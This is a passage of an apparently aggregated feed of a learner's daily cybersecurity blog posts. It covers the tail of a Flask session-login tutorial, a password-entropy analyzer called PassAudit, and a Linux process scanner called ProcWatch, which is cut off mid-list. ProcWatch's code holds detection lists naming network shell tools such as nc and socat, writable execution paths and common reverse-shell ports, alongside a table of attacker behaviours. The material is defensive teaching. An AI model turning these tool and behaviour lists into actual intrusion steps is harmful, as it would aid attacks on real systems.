to the login page.</li> <li>If yes, the dashboard page is rendered and the username is displayed.</li> </ul> <p>This enforces basic access control.</p> <h1> 5. Logout Route (<code>/logout</code>) </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/logout</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">logout</span><span class="p">():</span> <span class="n">session</span><span class="p">.</span><span class="nf">clear</span><span class="p">()</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="nf">url_for</span><span class="p">(</span><span class="sh">"</span><span class="s">login</span><span class="sh">"</span><span class="p">))</span> </code></pre> </div> <h3> What this does: </h3> <ul> <li>Clears all session data.</li> <li>Redirects the user back to login.</li> <li>Effectively logs the user out.</li> </ul> <h1> 6. Running the Application </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span> <span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">debug</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> </code></pre> </div> <ul> <li>Starts the Flask development server.</li> <li> <code>debug=True</code> enables automatic reload and detailed error messages during development.</li> </ul> <h1> Complete Authentication Flow </h1> <ol> <li>User visits <code>/</code> </li> <li>Submits login form</li> <li>Backend validates credentials against database</li> <li>If valid, session is created</li> <li>User gains access to <code>/dashboard</code> </li> <li>Logout clears session</li> </ol> <h1> Important Architectural Observations </h1> <ul> <li>Authentication is session-based.</li> <li>SQLite is used as a lightweight relational database.</li> <li>Access control depends on session presence.</li> <li>Database interaction is done synchronously per request.</li> <li>The system is suitable for demonstration or learning environments.</li> </ul> <h2> Result </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsmmnergbwxmw0uviqofv.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsmmnergbwxmw0uviqofv.png" alt="Login Page" width="800" height="375"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Filqgzqga08mlnrqgl8sa.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Filqgzqga08mlnrqgl8sa.png" alt=" " width="418" height="566"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkcbz1fqbi116rb3v6yw8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkcbz1fqbi116rb3v6yw8.png" alt=" " width="800" height="379"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kswon1l0fu59tdb5v5m.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kswon1l0fu59tdb5v5m.png" alt=" " width="408" height="598"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq94f9attz2tzj0lxh6jg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq94f9attz2tzj0lxh6jg.png" alt=" " width="800" height="380"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgz7g8kozr0etfjmekajr.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgz7g8kozr0etfjmekajr.png" alt=" " width="800" height="188"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9si46458yq6g0fzs9f2h.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9si46458yq6g0fzs9f2h.png" alt=" " width="731" height="59"></a></p> <h2> Why I Built This </h2> <p>As part of my ongoing cybersecurity learning journey, I want to:</p> <ul> <li>Build vulnerable systems intentionally</li> <li>Exploit them in a controlled environment</li> <li>Fix them properly</li> <li>Understand the “why,” not just the “how”</li> </ul> <p>Because real security knowledge comes from breaking and repairing systems yourself.</p> <p>Day 16 was not about writing more code. It was about writing safer code. And that difference matters.</p> python programming cybersecurity webdev Day 15 — I Built PassAudit : A Real-Time Password Security Analyzer (and it revealed how predictable we are) Hafiz Shamnad Mon, 02 Mar 2026 11:34:58 +0000 https://forem.com/hafiz_shamnad/day-15-i-built-passaudit-a-real-time-password-security-analyzer-and-it-revealed-how-45g1 https://forem.com/hafiz_shamnad/day-15-i-built-passaudit-a-real-time-password-security-analyzer-and-it-revealed-how-45g1 <p>A GUI tool that scores your password instantly… and brutally demonstrates why most passwords would not survive 5 minutes against a GPU.</p> <h2> Why I Made This </h2> <p>During CTFs and security labs, I kept noticing something funny.</p> <p>We spend hours learning:</p> <ul> <li>SQL Injection</li> <li>Privilege Escalation</li> <li>Memory corruption</li> <li>Network attacks</li> </ul> <p>But in real breaches?</p> <p>Attackers usually log in.</p> <p>Not hack in.</p> <p>They don’t defeat encryption.<br> They defeat <strong>human behavior</strong>.</p> <p>And the weakest point is always the same thing:</p> <p>passwords.</p> <p>So instead of another terminal script, I wanted something educational.<br> A tool that reacts while you type and visually shows:</p> <blockquote> <p>how a computer actually sees your password.</p> </blockquote> <p>That became <strong>PassAudit</strong>.</p> <h2> The Problem With Typical Password Checkers </h2> <p>Most websites use rules like:</p> <ul> <li>8 characters minimum</li> <li>1 uppercase</li> <li>1 number</li> <li>1 symbol</li> </ul> <p>So users create:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Hafiz@123 </code></pre> </div> <p>Technically complex.</p> <p>Practically terrible.</p> <p>Because attackers don’t guess passwords the way humans imagine.<br> They don’t “try combinations”.</p> <p>They calculate probability and search space.</p> <p>A password can look complicated and still be mathematically tiny.</p> <p>I wanted a tool that proves that instantly.</p> <h2> What PassAudit Actually Does </h2> <p>PassAudit analyzes your password on <strong>every keystroke</strong>.</p> <p>No submit button.</p> <p>As you type, it updates:</p> <p>• entropy score<br> • crack time estimate<br> • character diversity<br> • pattern detection<br> • dictionary detection<br> • security verdict</p> <p>The strength bar moves in real time.</p> <p>You can literally watch your password become safer or collapse into red.</p> <h2> The Core Idea: Entropy </h2> <p>The real measure of password strength is <strong>entropy</strong>.</p> <p>Entropy represents unpredictability.</p> <p>Formula:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>entropy = length × log₂(character_set_size) </code></pre> </div> <p>Character set size depends on what you use:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Characters</th> <th>Possibilities</th> </tr> </thead> <tbody> <tr> <td>lowercase</td> <td>26</td> </tr> <tr> <td>uppercase</td> <td>26</td> </tr> <tr> <td>numbers</td> <td>10</td> </tr> <tr> <td>symbols</td> <td>~32</td> </tr> </tbody> </table></div> <p>So a long password made only of lowercase letters is still weak.</p> <p>Because the search space stays small.</p> <p>Security isn’t about complexity.</p> <p>It’s about <strong>possibilities</strong>.</p> <h2> The Scariest Feature: Crack Time </h2> <p>PassAudit estimates how long a real attacker needs to brute-force the password.</p> <p>It assumes:</p> <blockquote> <p>10 billion guesses per second</p> </blockquote> <p>Which modern GPUs can realistically achieve in offline attacks.</p> <p>Calculation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>time = 2^entropy / guesses_per_second </code></pre> </div> <p>Example results:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Password</th> <th>Crack Time</th> </tr> </thead> <tbody> <tr> <td>password123</td> <td>seconds</td> </tr> <tr> <td>Qwerty@123</td> <td>minutes</td> </tr> <tr> <td>Tr0ub4dor&amp;3</td> <td>hours</td> </tr> <tr> <td>random 16-char</td> <td>thousands of years</td> </tr> </tbody> </table></div> <p>The important part:</p> <p>Security grows <strong>exponentially</strong>, not linearly.</p> <p>One unpredictable character can multiply safety by millions.</p> <h2> Catching Human Habits </h2> <p>While testing, I discovered something interesting.</p> <p>People don’t invent randomness.</p> <p>They invent <em>memories</em>.</p> <p>So I added behavior detections.</p> <h3> 1. Dictionary Detection </h3> <p>If a password contains common words:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>password admin welcome letmein </code></pre> </div> <p>the verdict drops immediately.</p> <p>Because real attackers don’t brute force first.<br> They run wordlists like <strong>rockyou.txt</strong>.</p> <h3> 2. Keyboard Pattern Detection </h3> <p>This one was eye-opening.</p> <p>Patterns like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>qwerty asdf 12345 </code></pre> </div> <p>appear constantly in breached databases.</p> <p>Humans remember finger motion, not randomness.</p> <p>Attackers know that.</p> <h3> 3. Character Diversity </h3> <p>The tool also checks if the password uses:</p> <ul> <li>lowercase</li> <li>uppercase</li> <li>numbers</li> <li>symbols</li> </ul> <p>Each category lights up visually.</p> <p>You instantly see what your password lacks.</p> <h2> Verdict Logic </h2> <p>PassAudit classifies passwords using strict thresholds:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Verdict</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td>WEAK</td> <td>entropy &lt; 40 OR predictable patterns</td> </tr> <tr> <td>MODERATE</td> <td>usable but risky</td> </tr> <tr> <td>STRONG</td> <td>high entropy, no flags</td> </tr> </tbody> </table></div> <p>Below 40 bits, modern cracking rigs can recover passwords extremely quickly.</p> <p>Above 60 bits, brute force becomes impractical.</p> <h2> What Surprised Me </h2> <p>I asked friends to create a “secure password”.</p> <p>Most looked like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Name@2024 College#1 Petname123 </code></pre> </div> <p>Different people.<br> Same structure.</p> <p>Humans optimize for remembering.<br> Attackers optimize for predicting.<br> And prediction wins.</p> <h2> Code Walkthrough (How PassAudit Actually Works) </h2> <p>PassAudit is divided into two parts:</p> <ol> <li>The security analysis engine</li> <li>The graphical interface</li> </ol> <p>The GUI only displays information.<br> All decisions are made by the analysis functions.</p> <h3> 1. Entropy Calculation </h3> <p>The core of the project is this function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">calc_entropy</span><span class="p">(</span><span class="n">password</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">float</span><span class="p">:</span> <span class="n">charset</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[a-z]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">charset</span> <span class="o">+=</span> <span class="mi">26</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[A-Z]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">charset</span> <span class="o">+=</span> <span class="mi">26</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[0-9]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">charset</span> <span class="o">+=</span> <span class="mi">10</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[^a-zA-Z0-9]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">charset</span> <span class="o">+=</span> <span class="mi">32</span> <span class="k">if</span> <span class="n">charset</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> <span class="k">return</span> <span class="mf">0.0</span> <span class="k">return</span> <span class="nf">round</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span> <span class="o">*</span> <span class="n">math</span><span class="p">.</span><span class="nf">log2</span><span class="p">(</span><span class="n">charset</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span> </code></pre> </div> <p>Instead of checking only password length, the program first determines <strong>how many possible characters could have been used</strong>.</p> <p>Each character category increases the search space:</p> <ul> <li>lowercase letters add 26 possibilities</li> <li>uppercase letters add 26</li> <li>digits add 10</li> <li>symbols add about 32</li> </ul> <p>The entropy formula:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>entropy = length × log₂(charset_size) </code></pre> </div> <p>This represents how many guesses an attacker needs on average.</p> <p>So two 10-character passwords can have completely different strength depending on the character types used.</p> <h3> 2. Dictionary Detection </h3> <p>Attackers rarely brute-force first.<br> They use wordlists.</p> <p>This function checks if the password contains common leaked passwords:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">dictionary_check</span><span class="p">(</span><span class="n">password</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="n">pl</span> <span class="o">=</span> <span class="n">password</span><span class="p">.</span><span class="nf">lower</span><span class="p">()</span> <span class="k">return</span> <span class="nf">any</span><span class="p">(</span><span class="n">w</span> <span class="ow">in</span> <span class="n">pl</span> <span class="k">for</span> <span class="n">w</span> <span class="ow">in</span> <span class="n">COMMON_PASSWORDS</span><span class="p">)</span> </code></pre> </div> <p>If the password contains words like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>password admin welcome letmein </code></pre> </div> <p>the tool immediately flags it as dangerous.</p> <p>Why?</p> <p>Because tools like Hashcat try millions of known passwords before attempting brute force.</p> <h3> 3. Keyboard Pattern Detection </h3> <p>Humans often remember motion, not randomness.</p> <p>So the program checks keyboard walks:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">pattern_check</span><span class="p">(</span><span class="n">password</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="n">pl</span> <span class="o">=</span> <span class="n">password</span><span class="p">.</span><span class="nf">lower</span><span class="p">()</span> <span class="k">return</span> <span class="nf">any</span><span class="p">(</span><span class="n">p</span> <span class="ow">in</span> <span class="n">pl</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">KEYBOARD_PATTERNS</span><span class="p">)</span> </code></pre> </div> <p>Patterns such as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>qwerty asdf 12345 </code></pre> </div> <p>are extremely common in breach databases.<br> Even if they look complex to a human, they are predictable to an attacker.</p> <h3> 4. Character Diversity </h3> <p>This function counts how many different character groups are used:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">diversity</span><span class="p">(</span><span class="n">password</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">int</span><span class="p">:</span> <span class="n">types</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[a-z]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">types</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[A-Z]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">types</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[0-9]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">types</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">if</span> <span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="sa">r</span><span class="sh">"</span><span class="s">[^a-zA-Z0-9]</span><span class="sh">"</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="n">types</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">return</span> <span class="n">types</span> </code></pre> </div> <p>It returns a number from 0 to 4.</p> <p>The GUI then lights up indicators for:</p> <ul> <li>lowercase</li> <li>uppercase</li> <li>digits</li> <li>symbols</li> </ul> <p>This gives instant visual feedback about missing categories.</p> <h3> 5. Crack Time Estimation </h3> <p>This is the most impactful feature psychologically.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">secs</span> <span class="o">=</span> <span class="p">(</span><span class="mi">2</span> <span class="o">**</span> <span class="n">entropy</span><span class="p">)</span> <span class="o">/</span> <span class="mi">10_000_000_000</span> </code></pre> </div> <p>The program assumes an attacker can test <strong>10 billion guesses per second</strong> using modern GPUs.</p> <p>Then it converts seconds into a human readable format like minutes, hours, days, or years.</p> <p>Users immediately understand the difference between:<br> “hard to guess” and “mathematically impossible”.</p> <h3> 6. The Verdict System </h3> <p>The decision engine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">get_verdict</span><span class="p">(</span><span class="n">ent</span><span class="p">,</span> <span class="n">dict_hit</span><span class="p">,</span> <span class="n">pat_hit</span><span class="p">):</span> <span class="k">if</span> <span class="n">ent</span> <span class="o">&lt;</span> <span class="mi">40</span> <span class="ow">or</span> <span class="n">dict_hit</span> <span class="ow">or</span> <span class="n">pat_hit</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">WEAK</span><span class="sh">"</span> <span class="k">if</span> <span class="n">ent</span> <span class="o">&lt;</span> <span class="mi">60</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">MODERATE</span><span class="sh">"</span> <span class="k">return</span> <span class="sh">"</span><span class="s">STRONG</span><span class="sh">"</span> </code></pre> </div> <p>This is intentionally strict.</p> <p>Even a long password becomes WEAK if it contains a dictionary word or keyboard pattern.<br> Because real attackers prioritize predictability, not just length.</p> <h3> 7. Real-Time Analysis (The Important Part) </h3> <p>The most important function in the program is the event handler:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">self</span><span class="p">.</span><span class="n">pw_entry</span><span class="p">.</span><span class="nf">bind</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;KeyRelease&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="n">self</span><span class="p">.</span><span class="n">_on_change</span><span class="p">)</span> </code></pre> </div> <p>Every time the user types a character, <code>_on_change()</code> runs.</p> <p>It:</p> <ol> <li>reads the password</li> <li>calculates entropy</li> <li>checks patterns</li> <li>updates warnings</li> <li>moves the strength bar</li> <li>updates the verdict</li> </ol> <p>This is why the interface feels “alive”.<br> The analysis is not triggered by a button, but by typing itself.</p> <h3> 8. Separating Logic From UI </h3> <p>A design decision I intentionally followed:</p> <p>The GUI never performs security logic.</p> <p>It only displays results from functions like:</p> <ul> <li><code>calc_entropy()</code></li> <li><code>dictionary_check()</code></li> <li><code>pattern_check()</code></li> </ul> <p>This makes the security engine reusable later in:</p> <ul> <li>a CLI tool</li> <li>a web application</li> <li>a login auditing system</li> </ul> <p>The interface is just the dashboard.</p> <p>The real work happens in the functions.</p> <h2> Technologies Used </h2> <ul> <li>Python</li> <li>CustomTkinter (for a modern dark UI)</li> <li>regex pattern detection</li> <li>entropy mathematics</li> </ul> <p>No online APIs.<br> No heavy security libraries.</p> <p>Just math + psychology.</p> <h2> Screenshots </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb816p785f9zr0yhovn64.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb816p785f9zr0yhovn64.png" alt=" " width="603" height="700"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6kzcubg1umuhcewzgtim.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6kzcubg1umuhcewzgtim.png" alt=" " width="603" height="696"></a></p> <h2> A Note on AI Assistance </h2> <p>One honest detail about this project.</p> <p>I’m not very strong on the design side of development. I enjoy security logic, analysis, and building tools, but UI layout and visual polish have never been my area. So for the interface layout and visual structuring, I used Claude to help me shape the GUI.</p> <p>The challenge itself is not an “AI-generated project”. All the security logic, entropy calculations, detections, and implementation were written and understood by me. I only used AI as a design assistant.</p> <p>I see this as part of modern engineering rather than a shortcut.</p> <p>Developers already rely on compilers, frameworks, linters, and libraries to handle things outside our core expertise. AI fits into that same space. It helps automate overhead work that we’re not specialized in, so we can focus on what we are actually trying to learn and build.</p> <p>In my case, that focus is cybersecurity concepts, not visual design.</p> <p>I believe the real skill today is not avoiding tools, but using them responsibly and understanding the code you ship.</p> <h2> What I Learned </h2> <p>I thought this would be a GUI project.</p> <p>It turned into a lesson about security.</p> <p>Strong passwords are not:</p> <p>long words<br> clever substitutions<br> personal references</p> <p>Strong passwords are:</p> <p><strong>unpredictable.</strong></p> <p>Security doesn’t usually fail because cryptography breaks.</p> <p>Security fails because humans are consistent.</p> <p>And computers are extremely good at exploiting consistency.</p> programming python cybersecurity security Day 14 — I Built ProcWatch : A Linux Process Security Scanner for Forensics & Incident Response Hafiz Shamnad Sun, 01 Mar 2026 06:17:20 +0000 https://forem.com/hafiz_shamnad/day-14-i-built-procwatch-a-linux-process-security-scanner-for-forensics-incident-response-2bm5 https://forem.com/hafiz_shamnad/day-14-i-built-procwatch-a-linux-process-security-scanner-for-forensics-incident-response-2bm5 <blockquote> <p>A small Python script that turned into a live anomaly detector and accidentally taught me how attackers actually live inside a Linux machine.</p> </blockquote> <h2> The Moment This Tool Became Necessary </h2> <p>If you’ve ever solved a Linux forensics CTF, you know the ritual.</p> <p>You SSH into the machine.<br> Everything <em>looks</em> normal.</p> <p>Then you notice:</p> <ul> <li>CPU usage feels weird</li> <li>There’s network traffic</li> <li>Logs don’t line up</li> </ul> <p>So you begin the ancient ceremony:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ps aux | <span class="nb">grep</span> <span class="nt">-v</span> <span class="nb">grep </span>netstat <span class="nt">-tulnp</span> <span class="nb">ls</span> <span class="nt">-la</span> /tmp <span class="nb">cat</span> /proc/&lt;pid&gt;/cmdline </code></pre> </div> <p>You scroll.<br> You guess.<br> You re-run commands.</p> <p>Somewhere in those 200+ processes is a reverse shell, a dropper, or a cryptominer… and you are manually playing <strong>Where’s Waldo: Incident Response Edition</strong>.</p> <p>After one challenge where I lost 40 minutes hunting a shell hiding in <code>/dev/shm</code>, I realized:</p> <blockquote> <p>I wasn’t solving a cybersecurity problem.<br> I was solving a <em>visibility</em> problem.</p> </blockquote> <p>So I built a tool.</p> <p>That tool became <strong>ProcWatch</strong>.</p> <h2> What ProcWatch Actually Is </h2> <p>ProcWatch is a Python-based <strong>process behavior scanner</strong>.</p> <p>Not antivirus.<br> Not signature detection.</p> <p>It asks a different question:</p> <blockquote> <p>Is any process on this system behaving like an attacker would?</p> </blockquote> <p>Instead of checking files, it watches <strong>process behavior patterns</strong> used in real intrusions.</p> <h2> The Threat Model </h2> <p>Before writing detections, I mapped how attackers typically behave after gaining Linux access:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Stage</th> <th>What attackers do</th> </tr> </thead> <tbody> <tr> <td>Foothold</td> <td>Drop binaries in <code>/tmp</code> or <code>/dev/shm</code> </td> </tr> <tr> <td>Control</td> <td>Spawn reverse shells</td> </tr> <tr> <td>Escalation</td> <td>Abuse SUID or LD_PRELOAD</td> </tr> <tr> <td>Persistence</td> <td>Run scripts via interpreters</td> </tr> <tr> <td>Monetization</td> <td>Install crypto miners</td> </tr> <tr> <td>Evasion</td> <td>Delete binaries after execution</td> </tr> </tbody> </table></div> <p>Every ProcWatch detection maps directly to one of these.</p> <h2> Detection 1 — Executing from Writable Directories (CRITICAL) </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">SUSPICIOUS_LOCATIONS</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">/tmp</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/dev/shm</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/var/tmp</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/run/user</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/dev/mqueue</span><span class="sh">"</span><span class="p">]</span> </code></pre> </div> <p>Malware loves writable directories because:</p> <ul> <li>No permissions required</li> <li>Rarely monitored</li> <li>Easy to clean up</li> </ul> <p><code>/dev/shm</code> is especially interesting.<br> It’s RAM-backed storage. Reboot the machine and evidence disappears.</p> <p>Legitimate software almost never runs from here.</p> <p>If you see:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/dev/shm/hidden_binary </code></pre> </div> <p>You didn’t find a program.</p> <p>You found the attacker.</p> <h2> Detection 2 — Suspicious Interpreter Usage </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">SUSPICIOUS_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">bash</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">sh</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">nc</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">python</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">perl</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">ruby</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">socat</span><span class="sh">"</span><span class="p">]</span> </code></pre> </div> <p>On its own this means nothing.</p> <p>But combined with location or network activity, it becomes powerful.</p> <p>A <code>python3</code> process is normal.<br> A <code>python3</code> process in <code>/tmp</code> connected to port 4444 is not.</p> <p>This is called <strong>living-off-the-land</strong>.<br> Attackers use legitimate tools so they don’t need to upload malware.</p> <h2> Detection 3 — Privilege Escalation Indicators </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">if</span> <span class="n">uids</span><span class="p">.</span><span class="n">real</span> <span class="o">!=</span> <span class="n">uids</span><span class="p">.</span><span class="n">effective</span><span class="p">:</span> </code></pre> </div> <p>Linux processes have:</p> <ul> <li>real UID</li> <li>effective UID</li> </ul> <p>If they differ, you just caught a <strong>SUID privilege escalation in action</strong>.</p> <p>Even more suspicious:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root process running from /home/user </code></pre> </div> <p>Root processes belong in <code>/usr/bin</code>, not a user’s Downloads folder.</p> <h2> Detection 4 — Reverse Shell &amp; C2 Detection </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="mi">4444</span><span class="p">,</span> <span class="mi">5555</span><span class="p">,</span> <span class="mi">7777</span><span class="p">,</span> <span class="mi">31337</span> </code></pre> </div> <p>These ports are classics for reverse shells and C2 listeners.</p> <p>ProcWatch distinguishes between:</p> <ul> 